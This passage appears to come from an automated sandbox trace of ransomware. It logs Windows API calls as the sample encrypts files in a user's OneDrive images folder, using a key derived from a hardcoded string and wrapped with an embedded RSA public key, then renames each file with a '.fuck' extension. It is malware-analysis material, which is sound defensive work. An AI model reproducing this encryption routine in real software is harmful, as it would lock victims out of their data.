pbData=0x2f2cb60*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2cb60*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.473] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2cb60*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2cb60*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.474] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x123, lpOverlapped=0x0) returned 1 [0277.476] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x123, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x130) returned 1 [0277.476] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x130, lpOverlapped=0x0) returned 1 [0277.476] CloseHandle (hObject=0x5d48) returned 1 [0277.476] CloseHandle (hObject=0x5d3c) returned 1 [0277.476] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder.svg"), bFailIfExists=0) returned 1 [0277.479] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder.svg", dwFileAttributes=0x0) returned 1 [0277.480] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder.svg.gsg")) returned 1 [0277.481] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder.svg.fuck")) returned 1 [0277.482] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0277.482] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.482] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.482] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.482] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.483] GetLastError () returned 0x0 [0277.483] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_desktop.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_desktop.svg")) returned 0x20 [0277.483] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_desktop.svg", dwFileAttributes=0x80) returned 1 [0277.483] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_desktop.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_desktop.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.484] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_desktop.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_desktop.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.485] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_desktop.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.486] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.488] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.488] lstrlenA (lpString="rSPGydZrXYMOziqdBDWJHbgxzMlQm") returned 29 [0277.488] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.488] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.488] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.488] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.488] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2bfb0) returned 1 [0277.489] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2bfb0, dwCertEncodingType=0x1, pInfo=0x2f34b30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f34b60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f34b68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fbdc8) returned 1 [0277.489] CryptEncrypt (in: hKey=0x2fbdc8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.489] CryptEncrypt (in: hKey=0x2fbdc8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2c940*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2c940*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.489] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2c940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2c940*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.492] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.532] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.533] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.549] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.549] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.549] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.549] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x9b, lpOverlapped=0x0) returned 1 [0277.549] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x9b, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0xa0) returned 1 [0277.549] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0xa0, lpOverlapped=0x0) returned 1 [0277.549] CloseHandle (hObject=0x5d3c) returned 1 [0277.549] CloseHandle (hObject=0x5d48) returned 1 [0277.550] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_desktop.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_desktop.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_desktop.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_desktop.svg"), bFailIfExists=0) returned 1 [0277.553] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_desktop.svg", dwFileAttributes=0x0) returned 1 [0277.554] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_desktop.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_desktop.svg.gsg")) returned 1 [0277.555] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_desktop.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_desktop.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_desktop.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_desktop.svg.fuck")) returned 1 [0277.556] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0277.556] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.556] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.556] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.557] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.557] GetLastError () returned 0x0 [0277.557] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_documents.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_documents.svg")) returned 0x20 [0277.557] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_documents.svg", dwFileAttributes=0x80) returned 1 [0277.557] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_documents.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_documents.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.558] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_documents.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_documents.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.559] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_documents.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.560] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.562] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.562] lstrlenA (lpString="rSPGydZrXYMOziqdBDWJHbgxzMlQm") returned 29 [0277.562] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.562] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.562] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.562] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.562] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2cad8) returned 1 [0277.563] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2cad8, dwCertEncodingType=0x1, pInfo=0x2f359d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f35a00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f35a08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fbf48) returned 1 [0277.563] CryptEncrypt (in: hKey=0x2fbf48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.563] CryptEncrypt (in: hKey=0x2fbf48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2cf18*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2cf18*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.563] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2cf18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2cf18*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.564] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.575] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.575] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.577] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.578] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.578] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.578] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.578] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.578] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.578] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.578] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.578] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.578] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.578] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.578] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.578] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.579] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.579] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.579] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.579] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.579] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.579] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.579] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.579] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.579] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.579] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.579] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.579] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.579] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.579] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.580] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.580] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.580] WriteFile (in: 